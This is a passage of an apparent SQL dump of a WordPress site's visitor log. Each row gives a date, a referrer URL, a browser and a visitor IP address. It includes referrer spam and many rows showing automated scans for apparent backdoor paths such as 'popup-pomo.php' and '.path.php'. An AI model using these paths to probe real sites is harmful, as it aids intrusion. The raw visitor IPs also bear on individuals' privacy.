),(10030,'2017-08-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.17.97.112','000',2,0),(10031,'2017-08-30','http://zphiblgz.org/menusa/popup-pomo.php','Chrome','Windows','5.0.375.99','','86.104.13.237','000',2,0),(10032,'2017-08-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.53.184.5','000',1,0),(10033,'2017-08-30','http://video-chat.love/','Unknown','Unknown','Unknown','','178.137.165.219','000',3,0),(10034,'2017-08-30','https://minharevisao.com/','Opera','Windows','9.0','','188.163.72.15','000',2,0),(10035,'2017-08-30','http://zphiblgz.org','Firefox','Windows','40.1','','105.102.12.156','000',2,0),(10036,'2017-08-30','http://zphiblgz.org','Firefox','Windows','29.0','','36.66.171.47','000',2,0),(10037,'2017-08-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.107.81.233','000',2,0),(10038,'2017-08-30','http://weburok.com/','Opera','Windows','6.0','','46.118.158.19','000',1,0),(10039,'2017-08-30','http://03e.info/','Opera','Windows','8.00','','46.118.158.19','000',3,0),(10040,'2017-08-30','http://zphiblgz.org','Safari','Macintosh','10.1.2','','71.179.15.79','000',2,0),(10041,'2017-08-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.245.60.8','000',2,0),(10042,'2017-08-30','http://mebel-vstroika.ru/','Opera','Windows','7.54','','178.137.4.41','000',3,0),(10043,'2017-08-30','http://zphiblgz.org/permalink/popup-pomo.php','Chrome','Windows','5.0.375.99','','198.57.247.178','000',1,0),(10044,'2017-08-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.192.0.58','000',2,0),(10045,'2017-08-30','http://zphiblgz.org/entful/popup-pomo.php','Chrome','Windows','5.0.375.99','','67.227.166.210','000',2,0),(10046,'2017-08-30','http://zphiblgz.org','Safari','iPhone','10.0','','73.191.115.122','000',1,0),(10047,'2017-08-30','http://dverimegapolis.ru/','Opera','Windows','7.54','','46.118.113.254','000',2,0),(10048,'2017-08-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.179.129','000',2,0),(10049,'2017-08-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.223.123.98','000',2,0),(10050,'2017-08-30','https://via-energy-acquistare.com/','Opera','Windows','8.01','','46.118.113.254','000',2,0),(10051,'2017-08-30','http://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','54.201.121.10','000',2,0),(10052,'2017-08-30','http://zphiblgz.org','Firefox','Windows','40.1','','181.74.231.38','000',2,0),(10053,'2017-08-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.212.115','000',2,0),(10054,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.172.193.32','000',2,0),(10055,'2017-08-31','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','192.40.95.34','000',11,0),(10056,'2017-08-31','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.53.184.23','000',1,0),(10057,'2017-08-31','http://zphiblgz.org','Firefox','Windows','40.1','','78.199.27.94','000',1,0),(10058,'2017-08-31','http://zphiblgz.org','Unknown','Unknown','Unknown','','5.189.166.132','000',1,0),(10059,'2017-08-31','http://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.12','000',1,0),(10060,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.170','000',2,0),(10061,'2017-08-31','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.125','000',3,0),(10062,'2017-08-31','http://zphiblgz.org','MSIE','Windows','6.0','','185.102.136.19','000',1,0),(10063,'2017-08-31','http://zphiblgz.org','Firefox','Windows','40.1','','188.228.88.11','000',2,0),(10064,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.207','000',1,0),(10065,'2017-08-31','http://zphiblgz.org/','Firefox','Windows','7.0.1','','151.80.238.152','000',1,0),(10066,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.170.41.8','000',4,0),(10067,'2017-08-31','http://zphiblgz.org','MSIE','Windows','6.0','','78.155.205.42','000',1,0),(10068,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.116.90','000',2,0),(10069,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.248.227.163','000',1,0),(10070,'2017-08-31','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.100.85.190','000',1,0),(10071,'2017-08-31','http://zphiblgz.org','Firefox','Windows','40.1','','180.191.61.7','000',1,0),(10072,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.85.61','000',2,0),(10073,'2017-08-31','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1530.R42TwT8h7ufzdaLjw2B6KlN52C5kwxSD4EXu97Ynsi-xy_ihLcn7_rG3aDsnbdzl.0bd7fda33910ecb94fed3951278047a3ff134877&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YM1sNxN_KHOPADPyHdOKa1Y&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSjd1dDR6UkJUVlBjZjRtOExSVjJoYVZOc0xKd3FvQ1oya0ZiQ3FxTW9sNEdxMVJWZ1VFdWRS&b64e=2&sign=4e3cd9e89c1c7a4f8b718f81efce85d0&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQULnoVAFacUfn4Y4XZAlcPiC_8jJniuZ2NIzPeCsFpaCyIZns3u2EbFlQDlVYT_MslDCYOQ-662NAvs569rL-ZwsOBbsUmaNBczZpnX-fJ_5ElTpymd5lM4Guc9koc98wuEL_qdSYboJ&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCViImF3hAv1WF-EC6A1TMCp0y45eRelYTdAYp7i3-J-bJO9XbOgB8tGI2hCBPLeECK10SHxU18quA&l10n=ru&cts=1504180495839&mc=6.59289423498','Firefox','Windows','53.0','','128.69.152.114','000',1,0),(10074,'2017-08-31','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(10075,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.107.81.233','000',2,0),(10076,'2017-08-31','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','132.131.124.226','000',2,0),(10077,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','137.74.167.96','000',2,0),(10078,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.77','000',2,0),(10079,'2017-08-31','http://zphiblgz.org','Opera','Windows','12.14','','54.237.234.90','000',2,0),(10080,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.223.200','000',2,0),(10081,'2017-08-31','http://zphiblgz.org','Firefox','Windows','40.1','','202.163.104.233','000',2,0),(10082,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.201.225.45','000',1,0),(10083,'2017-08-31','http://zphiblgz.org','Mechanize','Unknown','2.7.5','','35.196.136.29','000',1,0),(10084,'2017-08-31','http://zphiblgz.org','Chrome','Windows','51.0.2704.103','','185.85.190.132','000',2,0),(10085,'2017-08-31','http://zphiblgz.org','Chrome','Windows','51.0.2704.103','','185.86.167.4','000',2,0),(10086,'2017-08-31','http://zphiblgz.org','Firefox','Windows','40.1','','89.121.31.48','000',2,0),(10087,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.170.194','000',1,0),(10088,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.165.254.166','000',2,0),(10089,'2017-08-31','http://zphiblgz.org','python-requests','Unknown','2.18.4','','35.161.55.221','000',1,0),(10090,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.96.155.3','000',3,0),(10091,'2017-08-31','http://zphiblgz.org/','Firefox','Windows','7.0.1','','93.115.95.204','000',1,0),(10092,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.165.230.5','000',2,0),(10093,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.212.115','000',2,0),(10094,'2017-08-31','http://zphiblgz.org','Chrome','Windows','60.0.3112.113','','208.76.113.4','000',3,0),(10095,'2017-08-31','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',2,0),(10096,'2017-08-31','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',2,0),(10097,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.78','000',1,0),(10098,'2017-08-31','http://zphiblgz.org','Firefox','Windows','40.1','','177.52.197.94','000',1,0),(10099,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.245.60.8','000',1,0),(10100,'2017-08-31','http://zphiblgz.org/','Firefox','Windows','7.0.1','','89.234.157.254','000',1,0),(10101,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.171.202.150','000',3,0),(10102,'2017-08-31','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.139.161','000',1,0),(10103,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.171.40','000',2,0),(10104,'2017-08-31','http://zphiblgz.org','Firefox','Windows','40.1','','90.230.110.61','000',2,0),(10105,'2017-08-31','http://zphiblgz.org','MSIE','Windows','6.0','','46.17.42.140','000',1,0),(10106,'2017-08-31','https://xn--80abgj3a5acid6ghs.top/','MSIE','Windows','7.0b','','178.137.165.219','000',3,0),(10107,'2017-08-31','http://komp-pomosch.ru/','MSIE','Windows','6.0','','188.163.72.15','000',3,0),(10108,'2017-08-31','https://spb-plitka.ru/','MSIE','Windows','5.5','','188.163.72.15','000',1,0),(10109,'2017-08-31','http://zphiblgz.org','Firefox','Windows','40.1','','47.247.8.180','000',2,0),(10110,'2017-08-31','https://mojpreskumanie.com/','Opera','Windows','9.00','','188.163.72.15','000',3,0),(10111,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.223.82.156','000',2,0),(10112,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.174.32','000',2,0),(10113,'2017-08-31','https://2000k.ru/','Unknown','Unknown','Unknown','','178.137.4.41','000',3,0),(10114,'2017-08-31','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','5.61.44.59','000',2,0),(10115,'2017-08-31','http://zphiblgz.org','curl','Unknown','7.54.1','','5.61.44.59','000',3,0),(10116,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','137.74.169.241','000',2,0),(10117,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.126.252.12','000',2,0),(10118,'2017-08-31','http://pochtovyi-index.ru/','MSIE','Windows','6.0','','46.118.158.19','000',2,0),(10119,'2017-08-31','http://kaliningrad.zrus.org/','Unknown','Unknown','Unknown','','46.118.158.19','000',2,0),(10120,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.215','000',2,0),(10121,'2017-08-31','https://www.google.com/','Chrome','Android','60.0.3112.107','','166.137.244.22','000',8,0),(10122,'2017-08-31','https://www.google.com/','Chrome','Windows','60.0.3112.113','','100.16.222.168','000',1,0),(10123,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.192.0.58','000',2,0),(10124,'2017-08-31','http://zphiblgz.org/options/popup-pomo.php','Chrome','Windows','5.0.375.99','','79.172.252.11','000',1,0),(10125,'2017-08-31','http://zphiblgz.org','Firefox','Windows','40.1','','86.11.42.36','000',2,0),(10126,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.137.67.116','000',2,0),(10127,'2017-08-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','156.67.106.30','000',2,0),(10128,'2017-09-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.120.254.130','000',2,0),(10129,'2017-09-01','http://zphiblgz.org/wp-admin/','Firefox','Windows','3.5.0','','69.30.255.186','000',4,0),(10130,'2017-09-01','http://zphiblgz.org','MSIE','Windows','9.0','','69.30.255.186','000',133,0),(10131,'2017-09-01','http://zphiblgz.org','Firefox','Windows','40.1','','109.245.63.6','000',2,0),(10132,'2017-09-01','http://zphiblgz.org','Android Browser','Android','4.0','','104.168.144.151','000',100,0),(10133,'2017-09-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','141.170.2.53','000',2,0),(10134,'2017-09-01','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','192.40.95.34','000',3,0),(10135,'2017-09-01','http://zphiblgz.org','Firefox','Windows','40.1','','88.87.190.198','000',2,0),(10136,'2017-09-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.254.79.66','000',2,0),(10137,'2017-09-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.163.1.11','000',2,0),(10138,'2017-09-01','https://mojaocena.com/','Opera','Windows','7.11','','188.163.72.15','000',3,0),(10139,'2017-09-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.196.66.162','000',2,0),(10140,'2017-09-01','http://zphiblgz.org','Opera','Windows','12.14','','54.237.234.90','000',8,0),(10141,'2017-09-01','http://zphiblgz.org','curl','Unknown','7.38.0','','195.22.126.98','000',1,0),(10142,'2017-09-01','http://zphiblgz.org','Mechanize','Unknown','2.7.5','','35.196.51.30','000',1,0),(10143,'2017-09-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','154.16.149.35','000',2,0),(10144,'2017-09-01','https://kichenaid.ru/','MSIE','Windows','6.0','','46.118.159.26','000',5,0),(10145,'2017-09-01','http://zphiblgz.org','Firefox','Windows','40.1','','106.203.170.216','000',2,0),(10146,'2017-09-01','http://zphiblgz.org/paypal/popup-pomo.php','Chrome','Windows','5.0.375.99','','5.196.28.245','000',2,0),(10147,'2017-09-01','http://pk-pomosch.ru/','Opera','Windows','8.01','','46.118.158.19','000',6,0),(10148,'2017-09-01','http://zphiblgz.org','Firefox','Windows','40.1','','122.2.238.13','000',2,0),(10149,'2017-09-01','http://zphiblgz.org','MSIE','Windows','6.0','','109.248.250.155','000',1,0),(10150,'2017-09-01','http://zphiblgz.org','Java','Unknown','1.7.0','','52.41.187.186','000',1,0),(10151,'2017-09-01','http://zphiblgz.org','Firefox','Windows','53.0','','18.220.17.167','000',2,0),(10152,'2017-09-01','http://remontvsamare.su/','MSIE','Windows','6.0','','46.118.154.197','000',3,0),(10153,'2017-09-01','http://zphiblgz.org','Firefox','Windows','40.1','','177.13.248.26','000',2,0),(10154,'2017-09-01','http://zphiblgz.org','Firefox','Windows','40.1','','94.176.116.155','000',2,0),(10155,'2017-09-01','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',4,0),(10156,'2017-09-01','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(10157,'2017-09-01','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.24','000',1,0),(10158,'2017-09-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.215','000',2,0),(10159,'2017-09-01','zphiblgz.org','Chrome','Windows','50.0.2661.75','','133.242.22.177','000',1,0),(10160,'2017-09-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','144.217.240.34','000',2,0),(10161,'2017-09-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','151.80.238.152','000',2,0),(10162,'2017-09-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','103.243.25.96','000',5,0),(10163,'2017-09-01','zphiblgz.org','Chrome','Windows','50.0.2661.75','','46.101.165.68','000',1,0),(10164,'2017-09-01','http://zphiblgz.org','Firefox','Windows','40.1','','200.57.119.109','000',2,0),(10165,'2017-09-01','http://zphiblgz.org','Firefox','Windows','40.1','','162.231.126.117','000',2,0),(10166,'2017-09-01','http://zphiblgz.org/themes/popup-pomo.php','Chrome','Windows','5.0.375.99','','190.85.35.11','000',1,0),(10167,'2017-09-01','http://zphiblgz.org/stylesa/popup-pomo.php','Chrome','Windows','5.0.375.99','','192.145.239.12','000',2,0),(10168,'2017-09-01','http://zphiblgz.org','MSIE','Windows','6.0','','185.135.80.139','000',1,0),(10169,'2017-09-01','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','206.41.176.120','000',1,0),(10170,'2017-09-01','https://mmostrike.ru/','MSIE','Windows','5.5','','46.118.154.197','000',2,0),(10171,'2017-09-01','http://zphiblgz.org','Firefox','Windows','17.0','','162.247.73.204','000',18,0),(10172,'2017-09-01','http://zphiblgz.org','Firefox','Windows','40.1','','60.135.160.251','000',2,0),(10173,'2017-09-01','http://zphiblgz.org/','Chrome','Linux','51.0.2704.106','','170.130.179.34','000',1,0),(10174,'2017-09-01','http://zphiblgz.org/','Opera','Windows','12.17','','170.130.179.34','000',5,0),(10175,'2017-09-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.223.200','000',2,0),(10176,'2017-09-01','http://zphiblgz.org','Safari','iPhone','10.0','','73.191.115.122','000',1,0),(10177,'2017-09-01','http://zphiblgz.org/discussion/popup-pomo.php','Chrome','Windows','5.0.375.99','','213.251.182.115','000',1,0),(10178,'2017-09-02','http://hannasolution.ru/','MSIE','Windows','6.0','','46.118.159.26','000',2,0),(10179,'2017-09-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.63.98','000',1,0),(10180,'2017-09-02','http://zphiblgz.org','Chrome','Windows','60.0.3112.101','','185.82.217.214','000',1,0),(10181,'2017-09-02','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1532.xoCK_fCnC3o0AjpgA1jElHDTKSJxKrjXqfr85IkuHLtP3pUs0-Ta6-hDTF9coECS.502fc3a12f960adbd491ef9e995c277014ac33ba&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YKCJkrjchpDstTwxTkjwGrA&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSjd1dDR6UkJUVlBjQU95Q1ROVnZZcTBpTkhXcVFVSm1jYUF3dzlXcHZwak0wQUsyVlpKVlZq&b64e=2&sign=09f0c42633fde03509de838b3be5daa0&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7JarrrsxCpYMxlTU-48TEgTZJiJqkNUPEuj8ib25lwyh4wXgJNxhdJiWJx4KoyFQmJONs6ZELH8Zi5x-pRjfTH4s87aExATnSOw3LpOGit-ZW37d8sFmdXMUZrVIgZT3VUjf4&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXmyCrj7VrKuFnB9rDOGLsyDsLdp9tHUh4djLiCCvfsjhlQXaqAul3ICCoUGkIHnKhBcyjNQteZ9w&l10n=ru&cts=1504331480580&mc=5.23299675271','Firefox','Windows','53.0','','87.228.66.245','000',1,0),(10182,'2017-09-02','http://zphiblgz.org','SafeDNSBot','Unknown','Unknown','','146.185.137.144','000',5,0),(10183,'2017-09-02','http://zphiblgz.org/install/popup-pomo.php','Chrome','Windows','5.0.375.99','','122.155.9.136','000',1,0),(10184,'2017-09-02','http://zphiblgz.org','www','Unknown','Unknown','','80.82.215.160','000',1,0),(10185,'2017-09-02','http://zphiblgz.org','Firefox','Windows','40.1','','103.67.197.82','000',2,0),(10186,'2017-09-02','74.220.219.51','Firefox','Windows','33.0','','107.170.96.6','000',1,0),(10187,'2017-09-02','http://zphiblgz.org','Firefox','Windows','33.0','','159.203.196.79','000',1,0),(10188,'2017-09-02','http://zphiblgz.org','Chrome','Windows','60.0.3112.78','','138.197.111.64','000',1,0),(10189,'2017-09-02','http://zphiblgz.org','MSIE','Windows','9.0','','213.239.205.118','000',5,0),(10190,'2017-09-02','http://zphiblgz.org','MSIE','Windows','6.0','','109.248.250.155','000',1,0),(10191,'2017-09-02','http://zphiblgz.org','Firefox','Windows','40.1','','24.244.146.185','000',2,0),(10192,'2017-09-02','http://zphiblgz.org','Android Browser','Android','4.0','','185.126.179.232','000',7,0),(10193,'2017-09-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.42.116.16','000',1,0),(10194,'2017-09-02','http://zphiblgz.org/','Firefox','Windows','7.0.1','','151.80.238.152','000',1,0),(10195,'2017-09-02','http://komp-pomosch.ru/','Opera','Windows','6.01','','188.163.72.15','000',2,0),(10196,'2017-09-02','https://venerologiya.com/','Opera','Windows','7.02','','188.163.72.15','000',2,0),(10197,'2017-09-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','212.21.66.6','000',2,0),(10198,'2017-09-02','https://mojpreskumanie.com/','Opera','Windows','8.00','','188.163.72.15','000',2,0),(10199,'2017-09-02','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','64.233.172.166','000',1,0),(10200,'2017-09-02','http://zphiblgz.org','MSIE','Windows','6.0','','46.17.42.179','000',1,0),(10201,'2017-09-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.163.1.11','000',2,0),(10202,'2017-09-02','http://zphiblgz.org','Firefox','Windows','40.1','','91.157.96.162','000',2,0),(10203,'2017-09-02','http://zphiblgz.org/','version','Unknown','0.41','','186.46.94.130','000',1,0),(10204,'2017-09-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','156.67.106.32','000',2,0),(10205,'2017-09-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','128.52.128.105','000',1,0),(10206,'2017-09-02','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(10207,'2017-09-02','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(10208,'2017-09-02','http://zphiblgz.org/scripts/popup-pomo.php','Chrome','Windows','5.0.375.99','','91.149.157.145','000',1,0),(10209,'2017-09-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','144.217.92.145','000',1,0),(10210,'2017-09-02','http://zphiblgz.org','Firefox','Windows','40.1','','190.18.28.207','000',2,0),(10211,'2017-09-02','http://zphiblgz.org','Firefox','Windows','40.1','','168.181.120.120','000',1,0),(10212,'2017-09-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.200.20.46','000',1,0),(10213,'2017-09-02','http://zphiblgz.org/','Firefox','Windows','7.0.1','','199.249.223.74','000',1,0),(10214,'2017-09-02','http://zphiblgz.org','curl','Unknown','7.38.0','','195.22.126.98','000',1,0),(10215,'2017-09-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.11.167.4','000',2,0),(10216,'2017-09-02','http://se-welding.ru/','MSIE','Windows','6.0','','46.118.154.197','000',2,0),(10217,'2017-09-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','45.79.144.222','000',2,0),(10218,'2017-09-02','http://zphiblgz.org','Firefox','Windows','40.1','','46.27.217.242','000',2,0),(10219,'2017-09-02','http://zphiblgz.org','MSIE','Windows','6.0','','185.102.136.19','000',1,0),(10220,'2017-09-02','https://mojpregled.com/','MSIE','Windows','6.0','','188.163.72.15','000',1,0),(10221,'2017-09-02','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.35','000',1,0),(10222,'2017-09-02','http://zphiblgz.org','Firefox','Windows','40.1','','78.83.230.133','000',1,0),(10223,'2017-09-02','http://zphiblgz.org/optionsa/popup-pomo.php','Chrome','Windows','5.0.375.99','','185.58.206.198','000',1,0),(10224,'2017-09-02','http://zphiblgz.org/term/popup-pomo.php','Chrome','Windows','5.0.375.99','','62.210.190.54','000',1,0),(10225,'2017-09-02','http://zphiblgz.org','Firefox','Windows','54.0','','159.203.109.155','000',2,0),(10226,'2017-09-02','http://zphiblgz.org','Chrome','Macintosh','58.0.3029.81','','159.203.109.155','000',1,0),(10227,'2017-09-02','http://zphiblgz.org','Firefox','Linux','49.0','','159.203.109.155','000',1,0),(10228,'2017-09-02','http://zphiblgz.org','Chrome','Windows','60.0.3112.78','','159.203.109.155','000',1,0),(10229,'2017-09-02','http://zphiblgz.org','Safari','Macintosh','10.0.3','','159.203.109.155','000',2,0),(10230,'2017-09-02','http://zphiblgz.org','Chrome','Windows','59.0.3071.115','','159.203.109.155','000',1,0),(10231,'2017-09-02','http://zphiblgz.org','Chrome','Macintosh','60.0.3112.90','','159.203.109.155','000',1,0),(10232,'2017-09-02','http://zphiblgz.org/parseopml/popup-pomo.php','Chrome','Windows','5.0.375.99','','212.192.196.6','000',2,0),(10233,'2017-09-02','http://zphiblgz.org/parseopml/popup-pomo.php','Chrome','Windows','5.0.375.99','','188.120.224.73','000',2,0),(10234,'2017-09-02','http://zphiblgz.org','Android Browser','Android','4.0','','104.168.144.151','000',100,0),(10235,'2017-09-02','http://zphiblgz.org/setupconfig/popup-pomo.php','Chrome','Windows','5.0.375.99','','185.48.183.193','000',1,0),(10236,'2017-09-03','http://zphiblgz.org','MSIE','Windows','6.0','','185.135.80.139','000',1,0),(10237,'2017-09-03','http://zphiblgz.org/permalinka/popup-pomo.php','Chrome','Windows','5.0.375.99','','154.41.66.17','000',2,0),(10238,'2017-09-03','https://23kw.ru/','Unknown','Unknown','Unknown','','46.118.158.19','000',2,0),(10239,'2017-09-03','http://zphiblgz.org/profilea/popup-pomo.php','Chrome','Windows','5.0.375.99','','74.220.215.230','000',2,0),(10240,'2017-09-03','http://dvervmoskvu.ru/','Unknown','Unknown','Unknown','','46.118.159.26','000',3,0),(10241,'2017-09-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.34.210','000',2,0),(10242,'2017-09-03','http://zphiblgz.org/managera/popup-pomo.php','Chrome','Windows','5.0.375.99','','178.210.90.90','000',5,0),(10243,'2017-09-03','http://zphiblgz.org','Firefox','Windows','40.1','','120.147.35.194','000',2,0),(10244,'2017-09-03','http://zphiblgz.org/feeder/popup-pomo.php','Chrome','Windows','5.0.375.99','','208.100.58.82','000',1,0),(10245,'2017-09-03','http://zphiblgz.org/wp-includes/requests/utility/.path.php','Chrome','Windows','5.0.375.99','','198.57.140.70','000',1,0),(10246,'2017-09-03','http://zphiblgz.org','Firefox','Windows','40.1','','1.32.72.70','000',2,0),(10247,'2017-09-03','http://zphiblgz.org','Firefox','Windows','40.1','','1.246.161.113','000',2,0),(10248,'2017-09-03','http://zphiblgz.org','Firefox','Windows','40.1','','176.26.137.232','000',2,0),(10249,'2017-09-03','http://zphiblgz.org/network/popup-pomo.php','Chrome','Windows','5.0.375.99','','147.52.104.11','000',2,0),(10250,'2017-09-03','http://zphiblgz.org','Firefox','Windows','40.1','','203.251.187.75','000',2,0),(10251,'2017-09-03','http://zphiblgz.org','MSIE','Windows','6.0','','46.17.42.76','000',1,0),(10252,'2017-09-03','http://zphiblgz.org','Firefox','Linux','52.0','','54.165.139.220','000',2,0),(10253,'2017-09-03','http://zphiblgz.org/menus/popup-pomo.php','Chrome','Windows','5.0.375.99','','149.210.223.120','000',1,0),(10254,'2017-09-03','http://zphiblgz.org/','Firefox','Windows','53.0','','163.172.4.153','000',1,0),(10255,'2017-09-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.53.83','000',2,0),(10256,'2017-09-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','80.82.64.139','000',1,0),(10257,'2017-09-03','http://zphiblgz.org/','Firefox','Windows','7.0.1','','37.187.129.166','000',1,0),(10258,'2017-09-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.163.1.11','000',1,0),(10259,'2017-09-03','http://zphiblgz.org/','Firefox','Windows','7.0.1','','204.85.191.31','000',3,0),(10260,'2017-09-03','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1533.OBRuSVR08XIFCCD9EOuv9VgoH15i1IrVc0COGTUbbO_0gtb1jtbbd4QOPXrhJtOY.50be234f6874e13d7441b62ec2a47e4bd479fe60&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMIVJNtoWDTa6Ctl47TPu5I&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSjd1dDR6UkJUVlBRamswRTNaUEw2OEQwUXByZVNSZ2F1cHdIYkhtdHBkYm1VN19SY0htMWlz&b64e=2&sign=45af7e2cad803b5df9d2f3c9f129e5dc&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYpgPUyh7uQlnSAhFBtOfuSjSMyGox2jsGoMy-K4gJQFIB8m8BEpSosYycYmRxbWBvAhYgjy6xc8b7lSXVfQ1xenN30EdyQ6e8HSfwmvMrVKxzEw5QOQfMsZavBc0IN4zt_BqCmxLgaz&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWQWxj6qvocPyNiS6VgMFHVcyNhzAqGAdOLzTR0AgpWtMDqOAxyoe-b2c43FkcRGA74388RdVIiow&l10n=ru&cts=1504447011498&mc=2.73868697142','Firefox','Windows','53.0','','188.32.129.128','000',1,0),(10261,'2017-09-03','http://zphiblgz.org/discussion/popup-pomo.php','Chrome','Windows','5.0.375.99','','77.123.137.220','000',1,0),(10262,'2017-09-03','http://zphiblgz.org','python-requests','Unknown','2.18.4','','45.77.5.169','000',11,0),(10263,'2017-09-03','http://krasivoe-hd.net/','MSIE','Windows','6.0','','46.118.154.197','000',5,0),(10264,'2017-09-03','http://zphiblgz.org','Firefox','Windows','40.1','','83.45.212.7','000',2,0),(10265,'2017-09-03','http://zphiblgz.org','Firefox','Windows','40.1','','69.172.148.194','000',1,0),(10266,'2017-09-03','http://zphiblgz.org/homefeatured/popup-pomo.php','Chrome','Windows','5.0.375.99','','85.128.142.65','000',1,0),(10267,'2017-09-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.220.246.230','000',2,0),(10268,'2017-09-03','http://zphiblgz.org/canadapost/popup-pomo.php